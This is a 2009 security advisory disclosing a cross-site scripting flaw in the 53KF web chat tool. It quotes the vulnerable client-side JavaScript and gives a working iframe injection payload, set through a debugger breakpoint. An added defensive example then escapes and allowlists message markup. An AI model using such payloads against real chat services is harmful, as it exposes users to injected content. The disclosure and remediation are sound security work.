53KF Web Instant Messenger Cross Site Scripting

2009-01-21T00:00:00
ID PACKETSTORM:74151
Type packetstorm
Reporter xisigr
Modified 2009-01-21T00:00:00

Description

                                        
                                            `Application: 53KF Web IM  
Vendor: www.53kf.com  
Corporation: LiuDu, Inc.  
Version: Latest: (19 JAN 2009) - Home Edition, Enterprise & Professional  
Description: 53KF Web IM 2009 Cross-Site Scripting Vulnerabilities  
  
Background:  
==============  
53KF is a web-based group chat tool that lets you invite a client,  
colleague, or vendor to chat and collaborate. More than 220,000  
websites use 53KF.  
  
Vulnerability:  
==============  
The application does not properly sanitize message content before it  
is rendered, so an attacker can supply malicious HTML as part of an  
IM message. Input validation is performed on the client side only.  
  
Exploit:  
==============  
  
156 function sendmsg() {  
157   try{textCounter(document.getElementById("input1"),1000)}catch(e){}  
158   msg=document.getElementById("input1").value;  
159   if (msg.trim()=="") {  
160     return;  
161   }  
162   msg=UBBEncode(msg);  
163   document.getElementById("input1").value="";  
164   display_msg("<font color=\"#666666\">"+infos[13]+": "+getTime2()+"</font><br>  "+UBBCode(msg.trim()));  
165   try{msg=msgFilter(msg);}catch(e){}  
166   if(usezzdy=="1"){  
167     var rmsg=sendtext(msg);  
168     display_msg("<font color=\"#666666\">"+infos[57]+":</font><br>  <font color=\"#0000CE\">"+rmsg+"</font>");  
169   }else{  
170     if (typeof(rec_stat)!="undefined" && rec_stat==1){  
171       push_info("post","REC",mytempid,"11",UBBCode(msg.trim()),getTime());  
172       display_msg("<font color=\"#666666\">"+infos[29]+":</font><br>  <font color=\"#0000CE\">"+UBBCode(UBBEncode(lword_prompt))+"</font>");  
173     }  
174     else{  
175       qstmsg(UBBCode(msg.trim()));  
176     }  
177   }  
178   if (talk_fee_type==1)  
179   {  
180     talk_fee_type=0;  
181     url="http://www.53kf.cn/v5_talk.php?talk_fee_type=1&arg="+arg+"&style="+style;  
182     rpc(url);  
183   }  
184  
185   if(istalktype==1)  
186   {  
187     istalktype=0;  
188     url="http://www.53kf.cn/istalk.php?companyid="+company_id+"&istalk=1";  
189     rpc(url);  
190   }  
191 }  
  
Set a breakpoint (Firebug, etc.) at line 164 and set a new value:  
msg = "<iframe width=800 height=600 src='httP://WWW.g.cn'></iframe>"  
  
=========================  
xisigr[topsec]  
xisigr@gmail.com  
  
  
--  
-----------------------------------------------------------------  
NAME:xushaopei(xsp)  
ORG:Heart[T.P.S][F.S.T][J.I.C]  
QQ:9634989  
EMAIL:xisigr@gmail.com  
BLOG:http://www.hackheart.com  
-----------------------------------------------------------------  
`
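
The root cause described above is that encoding and filtering (`UBBEncode`, `msgFilter`) run only in the sender's browser, where `msg` can be changed after they have run. The following is an added example, not 53KF code and not part of the original advisory: it shows the rendering side treating every received message as untrusted, HTML-escaping it and expanding only an allowlist of UBB-style tags. The function names and the tag set (`[b]`, `[i]`, `[url=...]`) are assumptions; the page does not show what `UBBCode` accepts.

```javascript
// Added example with hypothetical names; run it on the server or in the recipient's page.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every HTML metacharacter so message text can never open a tag or attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Accept only absolute http(s) URLs; javascript:, data: and unparsable values are rejected.
function safeUrl(raw) {
  try {
    const u = new URL(raw);
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
  } catch (e) {
    return null;
  }
}

// Allowlisted UBB-style tags (assumed set): [b]..[/b], [i]..[/i], [url=...]..[/url].
const TAG = /\[(b|i)\]([\s\S]*?)\[\/\1\]|\[url=([^\]\s]+)\]([\s\S]*?)\[\/url\]/gi;

// Walk the raw message once. Text outside allowlisted tags, tag bodies and URLs
// are each escaped at the point they are written out, so no attacker-supplied
// character reaches the page as markup.
function renderMessage(untrusted) {
  const text = String(untrusted);
  let out = "", last = 0;
  for (const m of text.matchAll(TAG)) {
    out += escapeHtml(text.slice(last, m.index));
    if (m[1]) {
      const t = m[1].toLowerCase();
      out += `<${t}>${escapeHtml(m[2])}</${t}>`;
    } else {
      const url = safeUrl(m[3]);
      out += url
        ? `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(m[4])}</a>`
        : escapeHtml(m[0]); // rejected URL: show the tag as inert text
    }
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// The value the advisory sets at line 164, used here as test input.
const ADVISORY_PAYLOAD = "<iframe width=800 height=600 src='httP://WWW.g.cn'></iframe>";
console.log(renderMessage(ADVISORY_PAYLOAD));
```

Because the escaping happens where the HTML is produced, it holds no matter what the sending client did or skipped.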